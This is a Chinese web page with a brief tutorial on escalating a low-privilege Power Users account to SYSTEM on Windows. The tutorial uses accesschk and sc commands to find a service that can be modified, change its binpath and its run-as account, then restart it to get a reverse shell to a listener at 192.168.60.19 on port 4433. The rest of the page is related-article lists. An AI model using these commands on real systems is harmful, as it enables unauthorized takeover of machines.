会员服务

Windows低权限提权

2019 年 8 月 27 日 黑白之道


用户test隶属于Power User组,  登入系统,IP为192.168.60.23,监听服务IP地址为192.168.60.19


用到的工具:工具:accesschk


执行accesschk.exe -uwcqv "Power Users" * 获取可以操作的服务名称信息;  sc qc kdc查询kdc服务详细信息



查看系统启动的服务




修改参数binpath的值


执行sc config DcomLaunch obj= ".\LocalSystem" password= ""在重新启动DcomLaunch,在192.168.60.19监听的4433端口成功获取反弹,系统权限


你可能喜欢

突破不支持php脚本进行mysql提权

利用 CVE-2017-0213 简单提权

phpMyadmin实战提权某云云服务器

登录查看更多
0

相关内容

Microsoft Windows(视窗操作系统)是微软公司推出的一系列操作系统。它问世于1985年,当时是DOS之下的操作环境,而后其后续版本作逐渐发展成为个人电脑和服务器用户设计的操作系统。
【2020新书】实战R语言4,323页pdf
【2020新书】实战R语言4,323页pdf
专知会员服务
98+阅读 · 2020年7月1日
【实用书】Python技术手册,第三版767页pdf
【实用书】Python技术手册,第三版767页pdf
专知会员服务
229+阅读 · 2020年5月21日
【实用书】Python爬虫Web抓取数据,第二版,306页pdf
【实用书】Python爬虫Web抓取数据,第二版,306页pdf
专知会员服务
115+阅读 · 2020年5月10日
【毕业之路】如何修改博士论文?这份45页PPT《Editing your thesis》教你
【毕业之路】如何修改博士论文?这份45页PPT《Editing your thesis》教你
专知会员服务
73+阅读 · 2020年4月13日
【干货书】Python 3专业开发指南,468页pdf,Pro Python 3, 3rd Edition
【干货书】Python 3专业开发指南,468页pdf,Pro Python 3, 3rd Edition
专知会员服务
228+阅读 · 2020年4月1日
最新!人工智能顶会WSDM2020最佳论文出炉!UCSC斩获-主轴的幂用于精确团计数
最新!人工智能顶会WSDM2020最佳论文出炉!UCSC斩获-主轴的幂用于精确团计数
专知会员服务
25+阅读 · 2020年2月6日
【新书】Java企业微服务,Enterprise Java Microservices,272页pdf
【新书】Java企业微服务,Enterprise Java Microservices,272页pdf
专知会员服务
50+阅读 · 2020年1月30日
广东疾控中心《新型冠状病毒感染防护》,65页pdf
广东疾控中心《新型冠状病毒感染防护》,65页pdf
专知会员服务
18+阅读 · 2020年1月26日
【干货】大数据入门指南:Hadoop、Hive、Spark、 Storm等
【干货】大数据入门指南:Hadoop、Hive、Spark、 Storm等
专知会员服务
94+阅读 · 2019年12月4日
Keras作者François Chollet推荐的开源图像搜索引擎项目Sis
Keras作者François Chollet推荐的开源图像搜索引擎项目Sis
专知会员服务
29+阅读 · 2019年10月17日
AWVS12 V12.0.190530102 windows正式版完美破解版
AWVS12 V12.0.190530102 windows正式版完美破解版
黑白之道
29+阅读 · 2019年8月24日
msf实现linux shell反弹
msf实现linux shell反弹
黑白之道
49+阅读 · 2019年8月16日
漏洞预警丨Xstream远程代码执行漏洞
漏洞预警丨Xstream远程代码执行漏洞
FreeBuf
4+阅读 · 2019年7月25日
PHP使用Redis实现订阅发布与批量发送短信
PHP使用Redis实现订阅发布与批量发送短信
安全优佳
7+阅读 · 2019年5月5日
Pupy – 全平台远程控制工具
Pupy – 全平台远程控制工具
黑白之道
43+阅读 · 2019年4月26日
支持多标签页的Windows终端:Fluent 终端
支持多标签页的Windows终端:Fluent 终端
Python程序员
7+阅读 · 2019年4月15日
已删除
已删除
创业邦杂志
5+阅读 · 2019年3月27日
I2P - 适用于黑客的Android应用程序
I2P - 适用于黑客的Android应用程序
黑白之道
28+阅读 · 2019年3月6日
百度开源项目OpenRASP快速上手指南
百度开源项目OpenRASP快速上手指南
黑客技术与网络安全
5+阅读 · 2019年2月12日
React Native 分包哪家强?看这文就够了!
React Native 分包哪家强?看这文就够了!
程序人生
12+阅读 · 2019年1月16日
Meta-Learning with Implicit Gradients
Meta-Learning with Implicit Gradients
Arxiv
13+阅读 · 2019年9月10日
Tactical Rewind: Self-Correction via Backtracking in Vision-and-Language Navigation
Tactical Rewind: Self-Correction via Backtracking in Vision-and-Language Navigation
Arxiv
3+阅读 · 2019年3月6日
Collaborative Similarity Embedding for Recommender Systems
Arxiv
7+阅读 · 2019年2月19日
Bidirectional Attention for SQL Generation
Bidirectional Attention for SQL Generation
Arxiv
4+阅读 · 2018年6月21日
Density-Adaptive Kernel based Re-Ranking for Person Re-Identification
Arxiv
4+阅读 · 2018年5月20日
Image Captioning
Arxiv
11+阅读 · 2018年5月13日
Horizontal Pyramid Matching for Person Re-identification
Arxiv
3+阅读 · 2018年4月30日
Zero-Shot Sketch-Image Hashing
Arxiv
5+阅读 · 2018年3月6日
SQL-Rank: A Listwise Approach to Collaborative Ranking
Arxiv
6+阅读 · 2018年2月28日
CryptoRec: Secure Recommendations as a Service
Arxiv
6+阅读 · 2018年2月7日
VIP会员
相关主题
Microsoft Windows
SC
操作
PHP
Mysql
云服务
相关VIP内容
【2020新书】实战R语言4,323页pdf
【2020新书】实战R语言4,323页pdf
专知会员服务
98+阅读 · 2020年7月1日
【实用书】Python技术手册,第三版767页pdf
【实用书】Python技术手册,第三版767页pdf
专知会员服务
229+阅读 · 2020年5月21日
【实用书】Python爬虫Web抓取数据,第二版,306页pdf
【实用书】Python爬虫Web抓取数据,第二版,306页pdf
专知会员服务
115+阅读 · 2020年5月10日
【毕业之路】如何修改博士论文?这份45页PPT《Editing your thesis》教你
【毕业之路】如何修改博士论文?这份45页PPT《Editing your thesis》教你
专知会员服务
73+阅读 · 2020年4月13日
【干货书】Python 3专业开发指南,468页pdf,Pro Python 3, 3rd Edition
【干货书】Python 3专业开发指南,468页pdf,Pro Python 3, 3rd Edition
专知会员服务
228+阅读 · 2020年4月1日
最新!人工智能顶会WSDM2020最佳论文出炉!UCSC斩获-主轴的幂用于精确团计数
最新!人工智能顶会WSDM2020最佳论文出炉!UCSC斩获-主轴的幂用于精确团计数
专知会员服务
25+阅读 · 2020年2月6日
【新书】Java企业微服务,Enterprise Java Microservices,272页pdf
【新书】Java企业微服务,Enterprise Java Microservices,272页pdf
专知会员服务
50+阅读 · 2020年1月30日
广东疾控中心《新型冠状病毒感染防护》,65页pdf
广东疾控中心《新型冠状病毒感染防护》,65页pdf
专知会员服务
18+阅读 · 2020年1月26日
【干货】大数据入门指南:Hadoop、Hive、Spark、 Storm等
【干货】大数据入门指南:Hadoop、Hive、Spark、 Storm等
专知会员服务
94+阅读 · 2019年12月4日
Keras作者François Chollet推荐的开源图像搜索引擎项目Sis
Keras作者François Chollet推荐的开源图像搜索引擎项目Sis
专知会员服务
29+阅读 · 2019年10月17日
热门VIP内容
相关资讯
AWVS12 V12.0.190530102 windows正式版完美破解版
AWVS12 V12.0.190530102 windows正式版完美破解版
黑白之道
29+阅读 · 2019年8月24日
msf实现linux shell反弹
msf实现linux shell反弹
黑白之道
49+阅读 · 2019年8月16日
漏洞预警丨Xstream远程代码执行漏洞
漏洞预警丨Xstream远程代码执行漏洞
FreeBuf
4+阅读 · 2019年7月25日
PHP使用Redis实现订阅发布与批量发送短信
PHP使用Redis实现订阅发布与批量发送短信
安全优佳
7+阅读 · 2019年5月5日
Pupy – 全平台远程控制工具
Pupy – 全平台远程控制工具
黑白之道
43+阅读 · 2019年4月26日
支持多标签页的Windows终端:Fluent 终端
支持多标签页的Windows终端:Fluent 终端
Python程序员
7+阅读 · 2019年4月15日
已删除
已删除
创业邦杂志
5+阅读 · 2019年3月27日
I2P - 适用于黑客的Android应用程序
I2P - 适用于黑客的Android应用程序
黑白之道
28+阅读 · 2019年3月6日
百度开源项目OpenRASP快速上手指南
百度开源项目OpenRASP快速上手指南
黑客技术与网络安全
5+阅读 · 2019年2月12日
React Native 分包哪家强?看这文就够了!
React Native 分包哪家强?看这文就够了!
程序人生
12+阅读 · 2019年1月16日
相关论文
Meta-Learning with Implicit Gradients
Meta-Learning with Implicit Gradients
Arxiv
13+阅读 · 2019年9月10日
Tactical Rewind: Self-Correction via Backtracking in Vision-and-Language Navigation
Tactical Rewind: Self-Correction via Backtracking in Vision-and-Language Navigation
Arxiv
3+阅读 · 2019年3月6日
Collaborative Similarity Embedding for Recommender Systems
Arxiv
7+阅读 · 2019年2月19日
Bidirectional Attention for SQL Generation
Bidirectional Attention for SQL Generation
Arxiv
4+阅读 · 2018年6月21日
Density-Adaptive Kernel based Re-Ranking for Person Re-Identification
Arxiv
4+阅读 · 2018年5月20日
Image Captioning
Arxiv
11+阅读 · 2018年5月13日
Horizontal Pyramid Matching for Person Re-identification
Arxiv
3+阅读 · 2018年4月30日
Zero-Shot Sketch-Image Hashing
Arxiv
5+阅读 · 2018年3月6日
SQL-Rank: A Listwise Approach to Collaborative Ranking
Arxiv
6+阅读 · 2018年2月28日
CryptoRec: Secure Recommendations as a Service
Arxiv
6+阅读 · 2018年2月7日
大家都在搜
  1. ads-b
  2. 无人艇
  3. 基于大型语言模型
  4. 无人地面车辆
  5. 兵棋推演
  6. 卡尔曼
  7. 精益管理体系
  8. 智能仓储
  9. MoE
  10. 谭铁牛院士深度解析:人工智能是天使还是魔鬼?(内含PPT)
    11.
Top
微信扫码咨询专知VIP会员
Top